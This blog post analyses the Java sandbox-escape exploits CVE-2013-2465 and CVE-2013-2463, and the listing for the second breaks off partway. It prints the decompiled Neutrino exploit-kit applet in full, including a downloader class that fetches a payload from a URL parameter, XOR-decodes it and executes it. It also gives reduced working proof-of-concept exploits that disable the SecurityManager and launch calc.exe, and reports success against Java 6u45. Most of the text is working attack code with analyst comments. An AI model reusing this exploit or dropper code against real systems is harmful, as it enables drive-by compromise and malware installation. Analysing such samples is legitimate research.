A Java 6 killer – CVE-2013-2465 (update, now with CVE-2013-2463)

Now that my 30-day lab time at OffSec’s CTP course is up (awesome, more on that later), on to CVE-2013-2465, which can exploit all of Java 6, including the latest (6u45), as well as Java 7u21 and below and Java 5u45 and below. As noted elsewhere, this exploit, among many others, is significant because Java 6u45 will not be patched by Oracle, so anyone not upgrading to Java 7 (i.e. the latest out there) will be easily exploited… not that Java 7 is much better, but at least it’s being patched… on occasion…

A nice source to take a look at these exploits can be found here (and great blog overall): http://malware.dontneedcoffee.com/2013/08/cve-2013-2465-integrating-exploit-kits.html. They also seem to have CVE-2013-2463, which there seems to be a buzz about, so will probably take a look at that later:

 

UPDATE: I decided I didn’t need sleep, took a look at the Neutrino CVE-2013-2463 acquired from dontneedcoffee.com as well as CVE-2013-2465. They are nearly the same, so figured might as well include both here 🙂

Anyway, I wanted to see how this exploit worked and put together some working code, so I downloaded Neutrino’s take on the exploit, and analyzed it (‘deobfuscating’ manually of course… I use that term loosely this time).

Starting with CVE-2013-2465:

Files: alt (simplified), alt (original), drp, ijk, ikj, jik, jki, kji
Alt.java

import java.applet.Applet;
import java.awt.geom.AffineTransform;
import java.awt.image.AffineTransformOp;
import java.awt.image.BufferedImage;
import java.awt.image.DataBufferByte;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

/**
 * Applet entry class of the Neutrino CVE-2013-2465 sample, shown with the string
 * obfuscation already resolved.
 *
 * The listing is kept exactly as decompiled so it can be compared against the
 * original sample; only comments have been added.
 *
 * Analyst summary: {@link #init()} calls {@link #attempt()} up to five times while a
 * SecurityManager is installed, and only hands over to the downloader (drp.dx) once
 * System.getSecurityManager() returns null.
 */
public class Alt extends Applet
{
  // Not referenced anywhere in this class as shown.
  private static final String space = "[0-9]";
  // True when the "os.arch" property contains "64"; only used to adjust the bit offset in attempt().
  private boolean _is64 = System.getProperty("os.arch", "").contains("64");

  /**
   * Applet lifecycle entry point.
   *
   * Reads two applet parameters, "exec" and "xkey", and passes them to drp.dx();
   * both names are useful strings to look for in the embedding HTML page.
   * Every failure path ends in System.exit(0), so nothing is reported to the user.
   */
  public void init()
  {
    try
    {
      // Retry at most five times, and only while a SecurityManager is still installed.
      for (int i = 1; (i <= 5) && (ism()); i++)
        attempt();
      // Still sandboxed after all attempts: give up silently.
      if (ism())
        System.exit(0);
      String str = getParameter("exec");
      byte[] arrayOfByte = getParameter("xkey").getBytes("ISO_8859_1");
      drp.dx(str, arrayOfByte);
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  /**
   * Reports whether a SecurityManager is installed, via jki.gg()
   * (a wrapper around System.getSecurityManager() in jki.java on this page).
   *
   * @return true while the sandbox's SecurityManager is still in place
   */
  public static boolean ism()
  {
    return jki.gg() != null;
  }

  /**
   * One attempt at the CVE-2013-2465 memory corruption followed by the
   * security-manager removal.
   *
   * The statement order below is significant (the code depends on where the
   * objects it allocates end up relative to each other), so it is documented
   * rather than rearranged.
   *
   * @return 1 when arrayOfInt.length is unchanged after the image operation,
   *         0 in every other case, including success; init() ignores the value
   */
  private int attempt()
  {
    try
    {
      // ijk.scs() returns System.class (see ijk.java on this page).
      Class localClass = ijk.scs();
      String str = "setSecurityManager";
      // One argument slot left null: the Statement describes System.setSecurityManager(null).
      Object[] arrayOfObject1 = new Object[1];
      // ikj.stt() wraps new java.beans.Statement(...); localObject is never used afterwards.
      Object localObject = ikj.stt(localClass, str, arrayOfObject1);
      // 16-byte buffer that backs the destination image below.
      DataBufferByte localDataBufferByte = new DataBufferByte(16);
      int[] arrayOfInt = new int[8];
      // Slots 2-4 are filled below; slots 0, 1, 5 and 6 stay null.
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = ikj.stt(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      // An AccessControlContext whose only ProtectionDomain carries AllPermission.
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { 
            new ProtectionDomain(new CodeSource(null, new Certificate[0]), 
            localPermissions) });
      // jik.sgt() returns Statement.getTarget(), i.e. the target passed in above.
      arrayOfObject2[4] = jik.sgt(arrayOfObject2[2]);
      // Length before the image operation (8); compared again afterwards.
      int i = arrayOfInt.length;
      // Source image: 4x1, image type 2.
      BufferedImage localBufferedImage1 = new BufferedImage(4, 1, 2);
      // Destination layout: the last argument is the data bit offset, 44 (52 on 64-bit).
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel = 
            new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 44 + 
            (this._is64 ? 8 : 0));
      WritableRaster localWritableRaster = 
            Raster.createWritableRaster(localMultiPixelPackedSampleModel, 
            localDataBufferByte, null);
      // jki always answers true from isCompatibleRaster(), so this pairing of
      // colour model and raster is accepted.
      BufferedImage localBufferedImage2 = new BufferedImage(new jki(), 
            localWritableRaster, false, null);
      localBufferedImage1.getRaster().setPixel(0, 0, 
            new int[] { -1, -1, -1, -1 });
      // Identity transform: the filter() call is the operation the CVE concerns.
      AffineTransformOp localAffineTransformOp = new AffineTransformOp(
            new AffineTransform(1.0F, 0.0F, 0.0F, 1.0F, 0.0F, 0.0F), null);
      localAffineTransformOp.filter(localBufferedImage1, localBufferedImage2);
      int j = arrayOfInt.length;
      // Unchanged length means no corruption happened; the method stops here.
      if (j == i)
        return 1;
      int k = 0;
      int m = arrayOfObject2.length;
      // From here on arrayOfInt is indexed past its declared 8 elements.
      // NOTE(review): the zero/non-zero pattern mirrors arrayOfObject2 (length 7,
      // slots 2-4 set, the rest null), so this appears to locate that array in
      // memory and then replace a reference held by the Statement with the
      // AllPermission context -- inferred from the indices, not confirmed here.
      for (int n = i + 2; n < i + 32; n++)
        if ((arrayOfInt[(n - 1)] == m) && (arrayOfInt[n] == 0) && 
            (arrayOfInt[(n + 1)] == 0) && 
            (arrayOfInt[(n + 2)] != 0) && (arrayOfInt[(n + 3)] != 0) && 
            (arrayOfInt[(n + 4)] != 0) && 
            (arrayOfInt[(n + 5)] == 0) && (arrayOfInt[(n + 6)] == 0))
        {
          int i1 = arrayOfInt[(n + 4)];
          for (int i2 = n + 7; i2 < n + 7 + 64; i2++)
            if (arrayOfInt[i2] == i1)
            {
              arrayOfInt[(i2 - 1)] = arrayOfInt[(n + 3)];
              k = 1;
              break;
            }
          if (k != 0)
            break;
        }
      // Only executed when the overwrite above took place: kji.ste() calls
      // Statement.execute(), i.e. System.setSecurityManager(null).
      if (k != 0)
        try
        {
          kji.ste(arrayOfObject2[2]);
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
      // Deliberately silent: any failure just leads to the next attempt in init().
    }
    return 0;
  }

  // Dead code: the loop body is empty, so this returns a zero-filled array of
  // paramString.length() bytes. Not called anywhere in this class.
  private byte[] pic(String paramString)
  {
    int i = paramString.length();
    byte[] arrayOfByte = new byte[i];
    for (int j = 0; j < i; j++);
    return arrayOfByte;
  }

  // Dead code: returns one 'A' per input byte. Not called anywhere in this class.
  private String unpic(byte[] paramArrayOfByte)
  {
    StringBuilder localStringBuilder = new StringBuilder("");
    for (int i = 0; i < paramArrayOfByte.length; i++)
      localStringBuilder.append('A');
    return localStringBuilder.toString();
  }
}
Alt.java (original, as decompiled)

import java.applet.Applet;
import java.awt.geom.AffineTransform;
import java.awt.image.AffineTransformOp;
import java.awt.image.BufferedImage;
import java.awt.image.DataBufferByte;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

/**
 * Applet entry class of the Neutrino CVE-2013-2465 sample as decompiled, before
 * the strings were cleaned up.
 *
 * The only obfuscation visible here is digit padding: each interesting string
 * literal is a long run of digits with a few letters in it, and the digits are
 * removed at run time with replaceAll("[0-9]", "") or skipped with substring().
 * Scanning decompiled applets for that idiom is a cheap triage signal.
 * Code is left untouched; only comments have been added.
 */
public class Alt extends Applet
{
  // Not referenced anywhere in this class as shown.
  private static final String space = "[0-9]";
  // The literal is 53 characters long, so substring(51) yields "64".
  private boolean _is64 = System.getProperty("os.arch", "").contains("23658960895608958238905234850894369806320987698476264".substring(51));

  /**
   * Applet lifecycle entry point: up to five calls to attempt() while a
   * SecurityManager is installed, then the two applet parameters are read and
   * handed to drp.dx(). Every failure path ends in System.exit(0).
   */
  public void init()
  {
    try
    {
      for (int i = 1; (i <= 5) && (ism()); i++)
        attempt();
      if (ism())
        System.exit(0);
      // Digits stripped: the parameter name is "exec".
      String str = getParameter("7383568568e464564568465656x568458456845684568e6546845685684568c45845684878467864757584".replaceAll("[0-9]", ""));
      // Digits stripped: the parameter name is "xkey".
      byte[] arrayOfByte = getParameter("357868538x456845685368363865754767638967895738565437568568k65835683568335683456836e5658356856865856356y65548548685454".replaceAll("[0-9]", "")).getBytes("ISO_8859_1");
      drp.dx(str, arrayOfByte);
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  /**
   * Reports whether a SecurityManager is installed, via jki.gg()
   * (a wrapper around System.getSecurityManager() in jki.java on this page).
   */
  public static boolean ism()
  {
    return jki.gg() != null;
  }

  /**
   * One attempt at the memory corruption and the follow-up security-manager
   * removal. Statement order matters here, so the body is documented in place.
   *
   * @return 1 when arrayOfInt.length is unchanged after the image operation,
   *         0 otherwise (including success); init() ignores the value
   */
  private int attempt()
  {
    try
    {
      // ijk.scs() returns System.class (see ijk.java on this page).
      Class localClass = ijk.scs();
      // Digits stripped: the method name is "setSecurityManager".
      String str = "5787296778996057409608997181782001s38e45005225928t79487S9124417301e27388412740c6808u26779r304867i957349t193364y67997M1510a86087n53122a574023961g057026331060e06143687r9043645745487".replaceAll("[0-9]", "");
      // One argument slot left null: the Statement describes System.setSecurityManager(null).
      Object[] arrayOfObject1 = new Object[1];
      // localObject is never used afterwards.
      Object localObject = ikj.stt(localClass, str, arrayOfObject1);
      // 16-byte buffer that backs the destination image below.
      DataBufferByte localDataBufferByte = new DataBufferByte(16);
      int[] arrayOfInt = new int[8];
      // Slots 2-4 are filled below; slots 0, 1, 5 and 6 stay null.
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = ikj.stt(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      // An AccessControlContext whose only ProtectionDomain carries AllPermission.
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { new ProtectionDomain(new CodeSource(null, new Certificate[0]), localPermissions) });
      arrayOfObject2[4] = jik.sgt(arrayOfObject2[2]);
      // Length before the image operation (8); compared again afterwards.
      int i = arrayOfInt.length;
      BufferedImage localBufferedImage1 = new BufferedImage(4, 1, 2);
      // The last argument is the data bit offset, 44 (52 on 64-bit).
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel = new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 44 + (this._is64 ? 8 : 0));
      WritableRaster localWritableRaster = Raster.createWritableRaster(localMultiPixelPackedSampleModel, localDataBufferByte, null);
      // jki always answers true from isCompatibleRaster().
      BufferedImage localBufferedImage2 = new BufferedImage(new jki(), localWritableRaster, false, null);
      localBufferedImage1.getRaster().setPixel(0, 0, new int[] { -1, -1, -1, -1 });
      // Identity transform: the filter() call is the operation the CVE concerns.
      AffineTransformOp localAffineTransformOp = new AffineTransformOp(new AffineTransform(1.0F, 0.0F, 0.0F, 1.0F, 0.0F, 0.0F), null);
      localAffineTransformOp.filter(localBufferedImage1, localBufferedImage2);
      int j = arrayOfInt.length;
      // Unchanged length means no corruption happened; the method stops here.
      if (j == i)
        return 1;
      int k = 0;
      int m = arrayOfObject2.length;
      // From here on arrayOfInt is indexed past its declared 8 elements.
      // NOTE(review): the zero/non-zero pattern mirrors arrayOfObject2 (length 7,
      // slots 2-4 set, the rest null); what exactly is overwritten is inferred
      // from the indices, not confirmed here.
      for (int n = i + 2; n < i + 32; n++)
        if ((arrayOfInt[(n - 1)] == m) && (arrayOfInt[n] == 0) && (arrayOfInt[(n + 1)] == 0) && (arrayOfInt[(n + 2)] != 0) && (arrayOfInt[(n + 3)] != 0) && (arrayOfInt[(n + 4)] != 0) && (arrayOfInt[(n + 5)] == 0) && (arrayOfInt[(n + 6)] == 0))
        {
          int i1 = arrayOfInt[(n + 4)];
          for (int i2 = n + 7; i2 < n + 7 + 64; i2++)
            if (arrayOfInt[i2] == i1)
            {
              arrayOfInt[(i2 - 1)] = arrayOfInt[(n + 3)];
              k = 1;
              break;
            }
          if (k != 0)
            break;
        }
      // Only executed when the overwrite above took place: kji.ste() calls
      // Statement.execute() on the prepared Statement.
      if (k != 0)
        try
        {
          kji.ste(arrayOfObject2[2]);
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
      // Deliberately silent: any failure just leads to the next attempt in init().
    }
    return 0;
  }

  // Dead code: the loop body is empty, so this returns a zero-filled array.
  // Not called anywhere in this class.
  private byte[] pic(String paramString)
  {
    int i = paramString.length();
    byte[] arrayOfByte = new byte[i];
    for (int j = 0; j < i; j++);
    return arrayOfByte;
  }

  // Dead code: returns one 'A' per input byte. Not called anywhere in this class.
  private String unpic(byte[] paramArrayOfByte)
  {
    StringBuilder localStringBuilder = new StringBuilder("");
    for (int i = 0; i < paramArrayOfByte.length; i++)
      localStringBuilder.append('A');
    return localStringBuilder.toString();
  }
}
drp.java

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.UnsupportedEncodingException;
import java.net.URL;
import java.nio.ByteBuffer;
import java.nio.channels.Channels;
import java.nio.channels.ReadableByteChannel;
import javax.xml.bind.DatatypeConverter;

/**
 * Second stage of the sample: downloads a payload, XOR-decodes it, writes it to
 * a temporary file and runs it. Called from Alt.init() once the SecurityManager
 * is gone.
 *
 * Observable behaviour for detection, all visible in dx() below:
 * an outbound fetch by the Java plug-in process of a URL starting with "http",
 * a file created with the prefix "~tmf" in the default temp directory, and a
 * child process started from that file. The payload is XOR-encoded in transit,
 * so it will not look like an executable on the wire.
 *
 * NOTE(review): as decompiled, localByteBuffer is declared in the for-loop
 * header of dx() and used after the loop, so this listing does not compile
 * as shown.
 */
class drp
{
  /**
   * Base64-decodes paramString and returns the bytes as a UTF-8 string.
   */
  private static String db64(String paramString)
    throws UnsupportedEncodingException
  {
    byte[] arrayOfByte = DatatypeConverter.parseBase64Binary(paramString);
    return new String(arrayOfByte, "UTF-8");
  }

  /**
   * Fetches, decodes, drops and executes the payload.
   *
   * @param paramString      payload URL, either plain or Base64-encoded
   *                         (the applet's "exec" parameter)
   * @param paramArrayOfByte repeating XOR key (the applet's "xkey" parameter)
   * @throws IOException if reading the response or writing the file fails
   */
  public static void dx(String paramString, byte[] paramArrayOfByte)
    throws IOException
  {
    if (paramString.isEmpty())
      System.exit(0);
    // A value that does not start with "http" is treated as Base64 and decoded once.
    if (!paramString.startsWith("http"))
      paramString = db64(paramString);
    if (!paramString.startsWith("http"))
      System.exit(0);
    ReadableByteChannel localReadableByteChannel = null;
    try
    {
      localReadableByteChannel = 
        Channels.newChannel(new URL(paramString).openStream());
    }
    catch (IOException localIOException)
    {
      System.exit(0);
    }
    // Reads the whole response into memory; rsb() grows the buffer as needed.
    for (ByteBuffer localByteBuffer = ByteBuffer.allocate(4096); 
        localReadableByteChannel.read(localByteBuffer) != -1; 
        localByteBuffer = rsb(localByteBuffer));
    byte[] arrayOfByte = new byte[localByteBuffer.position()];
    localByteBuffer.position(0);
    localByteBuffer.get(arrayOfByte);
    // Prefix "~tmf", default suffix, default temp directory.
    File localFile = File.createTempFile("~tmf", null);
    FileOutputStream localFileOutputStream = new FileOutputStream(localFile);
    int i = paramArrayOfByte.length;
    // Repeating-key XOR over the downloaded bytes.
    for (int j = 0; j < arrayOfByte.length; j++)
      arrayOfByte[j] = ((byte)(arrayOfByte[j] ^ paramArrayOfByte[(j % i)]));
    localFileOutputStream.write(arrayOfByte);
    localFileOutputStream.flush();
    localFileOutputStream.close();
    // The dropped file is started directly by its absolute path.
    Runtime.getRuntime().exec(new String[] { localFile.getAbsolutePath() });
    System.exit(0);
  }

  /**
   * Returns a buffer with at least 4096 bytes of room: the same buffer when it
   * still has that much remaining, otherwise a new one of twice the capacity
   * holding the data read so far.
   */
  private static ByteBuffer rsb(ByteBuffer paramByteBuffer)
  {
    ByteBuffer localByteBuffer = paramByteBuffer;
    if (paramByteBuffer.remaining() < 4096)
    {
      localByteBuffer = ByteBuffer.allocate(paramByteBuffer.capacity() * 2);
      paramByteBuffer.flip();
      localByteBuffer.put(paramByteBuffer);
    }
    return localByteBuffer;
  }
}
ijk.java

import java.awt.color.ICC_ColorSpace;
import java.awt.color.ICC_Profile;

/**
 * Colour space used by the jki colour model in this sample.
 *
 * It is built on the profile for colour space constant 1000 but reports a
 * single component from getNumComponents().
 * NOTE(review): that mismatch is presumably what the CVE description's
 * "Incorrect image channel verification" refers to -- not confirmed from this page.
 */
public class ijk extends ICC_ColorSpace
{
  public ijk()
  {
    super(ICC_Profile.getInstance(1000));
  }

  // Always reports one component, regardless of the underlying profile.
  public int getNumComponents()
  {
    int i = 1;
    return i;
  }

  // Indirection only: returns System.class for use as the Statement target in Alt.attempt().
  public static Class scs()
  {
    return System.class;
  }
}
ikj.java

import java.beans.Statement;

/**
 * Indirection class from the sample: keeps the java.beans.Statement constructor
 * call out of Alt.java. It adds no behaviour of its own.
 */
public class ikj
{
  /**
   * Creates a java.beans.Statement for the given target, method name and arguments.
   *
   * @return the new Statement, typed as Object
   */
  public static Object stt(Object paramObject, String paramString, 
    Object[] paramArrayOfObject)
    throws Exception
  {
    return new Statement(paramObject, paramString, paramArrayOfObject);
  }
}
jik.java

import java.beans.Statement;

/**
 * Indirection class from the sample: wraps Statement.getTarget().
 */
public class jik
{
  // Casts the argument to java.beans.Statement and returns its target object.
  public static Object sgt(Object paramObject)
  {
    return ((Statement)paramObject).getTarget();
  }
}
jki.java

import java.awt.image.ComponentColorModel;
import java.awt.image.Raster;

/**
 * Colour model used for the destination image in Alt.attempt().
 *
 * It declares three 8-bit components on top of the ijk colour space and
 * overrides isCompatibleRaster() to accept any raster, so the raster it is
 * paired with is never rejected by that check.
 */
public class jki extends ComponentColorModel
{
  public jki()
  {
    super(new ijk(), new int[] { 8, 8, 8 }, false, false, 1, 0);
  }

  // Unconditionally true: the raster argument is not inspected.
  public boolean isCompatibleRaster(Raster paramRaster)
  {
    boolean bool = true;
    return bool;
  }

  // Indirection only: returns System.getSecurityManager(); used by Alt.ism().
  public static SecurityManager gg()
  {
    return System.getSecurityManager();
  }
}
kji.java

import java.beans.Statement;

/**
 * Indirection class from the sample: wraps Statement.execute().
 */
public class kji
{
  // Casts the argument to java.beans.Statement and executes it.
  // Any exception is swallowed, so a failed call leaves no trace for the caller.
  public static void ste(Object paramObject)
  {
    try
    {
      ((Statement)paramObject).execute();
    }
    catch (Exception localException)
    {
    }
  }
}

After some review, honestly, the exploit has very little obfuscation. Really, Alt.java is the most notable file, as it contains the actual exploit (the “attempt” function). The only other two files that are necessary are ijk.java (it extends ICC_ColorSpace) and jki (extends ComponentColorModel).

These are the reduced files (which, as always, will pop up calc.exe upon exploit).

Note: Remember to only use this on machines you’re authorized to exploit, anything else is illegal!

Files: appletMain, myColorModel, myColorSpace
Alt.java

import java.applet.Applet;
import java.awt.geom.AffineTransform;
import java.awt.image.AffineTransformOp;
import java.awt.image.BufferedImage;
import java.awt.image.DataBufferByte;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
import java.beans.Statement;

/**
 * Reduced proof-of-concept for CVE-2013-2465: the Neutrino sample with the
 * wrapper classes inlined and the downloader replaced by a calc.exe launch.
 *
 * Code is left exactly as published; only comments have been added. The
 * statement order in attempt() is significant and should not be rearranged
 * when comparing this listing with other samples.
 */
public class Alt extends Applet
{
  // True when the "os.arch" property contains "64"; only used to adjust the bit offset in attempt().
  private boolean _is64 = System.getProperty("os.arch", "").contains("64");

  /**
   * Applet lifecycle entry point: up to five calls to attempt() while a
   * SecurityManager is installed. If none is left afterwards, calc.exe is
   * started as a visible success marker; otherwise the JVM exits.
   */
  public void init()
  {
    try
    {
      for (int i = 1; (i <= 5) && (isSecManNotNull()); i++)
      {
        attempt();
      }
      // Still sandboxed after all attempts: give up silently.
      if (isSecManNotNull())
      {
         System.exit(0);
      }
      Runtime.getRuntime().exec(new String[] { "calc.exe" });
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  /**
   * @return true while System.getSecurityManager() is non-null
   */
  public static boolean isSecManNotNull()
  {
    return System.getSecurityManager() != null;
  }

  /**
   * One attempt at the memory corruption and the follow-up security-manager
   * removal.
   *
   * @return 1 when arrayOfInt.length is unchanged after the image operation,
   *         0 otherwise (including success); init() ignores the value
   */
  private int attempt()
  {
    try
    {
      Class localClass = getSystemClass();
      String str = "setSecurityManager";
      // One argument slot left null: the Statement describes System.setSecurityManager(null).
      Object[] arrayOfObject1 = new Object[1];
      // localObject is never used afterwards.
      Object localObject = new Statement(localClass, str, arrayOfObject1);
      // 16-byte buffer that backs the destination image below.
      DataBufferByte localDataBufferByte = new DataBufferByte(16);
      int[] arrayOfInt = new int[8];
      // Slots 2-4 are filled below; slots 0, 1, 5 and 6 stay null.
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = new Statement(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      // An AccessControlContext whose only ProtectionDomain carries AllPermission.
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { 
            new ProtectionDomain(new CodeSource(null, new Certificate[0]), 
            localPermissions) });
      arrayOfObject2[4] = ((Statement)arrayOfObject2[2]).getTarget();
      // Length before the image operation (8); compared again afterwards.
      int i = arrayOfInt.length;
      BufferedImage localBufferedImage1 = new BufferedImage(4, 1, 2);
      // The last argument is the data bit offset, 44 (52 on 64-bit).
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel = 
            new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 44 + 
            (this._is64 ? 8 : 0));
      WritableRaster localWritableRaster = 
            Raster.createWritableRaster(localMultiPixelPackedSampleModel, 
            localDataBufferByte, null);
      // myColorModel always answers true from isCompatibleRaster().
      BufferedImage localBufferedImage2 = new BufferedImage(
            new myColorModel(), localWritableRaster, false, null);
      localBufferedImage1.getRaster().setPixel(0, 0, 
            new int[] { -1, -1, -1, -1 });
      // Identity transform: the filter() call is the operation the CVE concerns.
      AffineTransformOp localAffineTransformOp = 
            new AffineTransformOp(new AffineTransform(1.0F, 0.0F, 
            0.0F, 1.0F, 0.0F, 0.0F), null);
      localAffineTransformOp.filter(localBufferedImage1, localBufferedImage2);
      int j = arrayOfInt.length;
      // Unchanged length means no corruption happened; the method stops here.
      if (j == i)
        return 1;
      int k = 0;
      int m = arrayOfObject2.length;
      // From here on arrayOfInt is indexed past its declared 8 elements.
      // NOTE(review): the zero/non-zero pattern mirrors arrayOfObject2 (length 7,
      // slots 2-4 set, the rest null); what exactly is overwritten is inferred
      // from the indices, not confirmed here.
      for (int n = i + 2; n < i + 32; n++)
        if ((arrayOfInt[(n - 1)] == m) 
            && (arrayOfInt[n] == 0) 
            && (arrayOfInt[(n + 1)] == 0) 
            && (arrayOfInt[(n + 2)] != 0) 
            && (arrayOfInt[(n + 3)] != 0) 
            && (arrayOfInt[(n + 4)] != 0) 
            && (arrayOfInt[(n + 5)] == 0) 
            && (arrayOfInt[(n + 6)] == 0))
        {
          int i1 = arrayOfInt[(n + 4)];
          for (int i2 = n + 7; i2 < n + 7 + 64; i2++)
            if (arrayOfInt[i2] == i1)
            {
              arrayOfInt[(i2 - 1)] = arrayOfInt[(n + 3)];
              k = 1;
              break;
            }
          if (k != 0)
            break;
        }
      // Only executed when the overwrite above took place.
      if (k != 0)
        try
        {
          ((Statement)arrayOfObject2[2]).execute();
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
      // Deliberately silent: any failure just leads to the next attempt in init().
    }
    return 0;
  }

  // Leftover from the original sample: the loop body is empty, so this returns
  // a zero-filled array. Not called anywhere in this class.
  private byte[] pic(String paramString)
  {
    int i = paramString.length();
    byte[] arrayOfByte = new byte[i];
    for (int j = 0; j < i; j++);
    return arrayOfByte;
  }

  // Leftover from the original sample: returns one 'A' per input byte.
  // Not called anywhere in this class.
  private String unpic(byte[] paramArrayOfByte)
  {
    StringBuilder localStringBuilder = new StringBuilder("");
    for (int i = 0; i < paramArrayOfByte.length; i++)
      localStringBuilder.append('A');
    return localStringBuilder.toString();
  }

  // Returns System.class, the target of the Statement built in attempt().
  public static Class getSystemClass()
  {
    return System.class;
  }
}
myColorModel.java

import java.awt.image.ComponentColorModel;
import java.awt.image.Raster;

/**
 * Colour model used for the destination image in Alt.attempt() (the renamed
 * jki class of the original sample).
 *
 * It declares three 8-bit components on top of myColorSpace and overrides
 * isCompatibleRaster() to accept any raster.
 */
public class myColorModel extends ComponentColorModel
{
  public myColorModel()
  {
    super(new myColorSpace(), new int[] { 8, 8, 8 }, false, false, 1, 0);
  }

  // Unconditionally true: the raster argument is not inspected.
  public boolean isCompatibleRaster(Raster paramRaster)
  {
    boolean bool = true;
    return bool;
  }
}
myColorSpace.java

import java.awt.color.ICC_ColorSpace;
import java.awt.color.ICC_Profile;

/**
 * Colour space used by myColorModel (the renamed ijk class of the original sample).
 *
 * It is built on the profile for colour space constant 1000 but reports a
 * single component from getNumComponents().
 * NOTE(review): that mismatch is presumably what the CVE description's
 * "Incorrect image channel verification" refers to -- not confirmed from this page.
 */
public class myColorSpace extends ICC_ColorSpace
{
  public myColorSpace()
  {
    super(ICC_Profile.getInstance(1000));
  }

  // Always reports one component, regardless of the underlying profile.
  public int getNumComponents()
  {
    int i = 1;
    return i;
  }
}

And, the result against Java6u45 (no click to run apparently necessary):
cve-2013-2465-success

The CVE description says this is related to “Incorrect image channel verification”.

The key seems to be where the AccessControlContext class is essentially passed a Permissions object containing AllPermission. From what I gather, AffineTransformOp has a call to a vulnerable storeImageArray() method, which seems to have something like a buffer overflow vulnerability: the write lands outside the image buffer and corrupts neighbouring objects on the Java heap (the code detects this by checking whether arrayOfInt.length has changed). The sandbox is only left afterwards, when the prepared Statement runs System.setSecurityManager(null) under the AllPermission context and so removes the Security Manager (or something like that, Java isn’t my specialty).

Update:
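Now, taking a look at CVE-2013-2463, the code is just about the same; it just exploits AlphaComposite.Src.createContext instead of AffineTransformOp. The end code is very similar (the key differing areas were bolded in the original post; the bolding does not survive here, but they are the raster and sample-model setup and the compose() call in attempt()). Also, only a single class is used for this exploit.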

appletMain
Alt2.java

import java.applet.Applet;
import java.awt.AlphaComposite;
import java.awt.CompositeContext;
import java.awt.image.DataBufferByte;
import java.awt.image.IndexColorModel;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
import java.beans.Statement;

/**
 * Reduced proof-of-concept for CVE-2013-2463. The structure matches the
 * CVE-2013-2465 listing; the difference is that the image operation is a
 * CompositeContext.compose() call obtained from AlphaComposite.Src instead of
 * AffineTransformOp.filter(), and no custom colour model classes are needed.
 *
 * Code is left exactly as published; only comments have been added.
 */
public class Alt2 extends Applet
{

  // True when the "os.arch" property contains "64"; adjusts the sample-model values in attempt().
  private boolean _is64 = System.getProperty("os.arch", "").contains("64");

  /**
   * Applet lifecycle entry point: up to five calls to attempt() while a
   * SecurityManager is installed. If none is left afterwards, calc.exe is
   * started as a visible success marker; otherwise the JVM exits.
   */
  public void init()
  {
    try
    {
      for (int i = 1; (i <= 5) && (isSecManNotNull()); i++)
      {
        attempt();
      }
      // Still sandboxed after all attempts: give up silently.
      if (isSecManNotNull())
      {
         System.exit(0);
      }
      Runtime.getRuntime().exec(new String[] { "calc.exe" });
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  /**
   * @return true while System.getSecurityManager() is non-null
   */
  public static boolean isSecManNotNull()
  {
    return System.getSecurityManager() != null;
  }

  /**
   * One attempt at the memory corruption and the follow-up security-manager
   * removal. Statement order matters here, so the body is documented in place.
   *
   * @return 1 when arrayOfInt.length is unchanged after the compose() call,
   *         0 otherwise (including success); init() ignores the value
   */
  private int attempt()
  {
    try
    {
      Class localClass = getSystemClass();
      String str = "setSecurityManager";
      // One argument slot left null: the Statement describes System.setSecurityManager(null).
      Object[] arrayOfObject1 = new Object[1];
      // localObject is never used afterwards.
      Object localObject = new Statement(localClass, str, arrayOfObject1);
      // 9-byte buffer that backs the destination raster below.
      DataBufferByte localDataBufferByte1 = new DataBufferByte(9);
      int[] arrayOfInt = new int[8];
      // Slots 2-4 are filled below; slots 0, 1, 5 and 6 stay null.
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = new Statement(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      // An AccessControlContext whose only ProtectionDomain carries AllPermission.
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { 
            new ProtectionDomain(new CodeSource(null, new Certificate[0]), 
            localPermissions) });
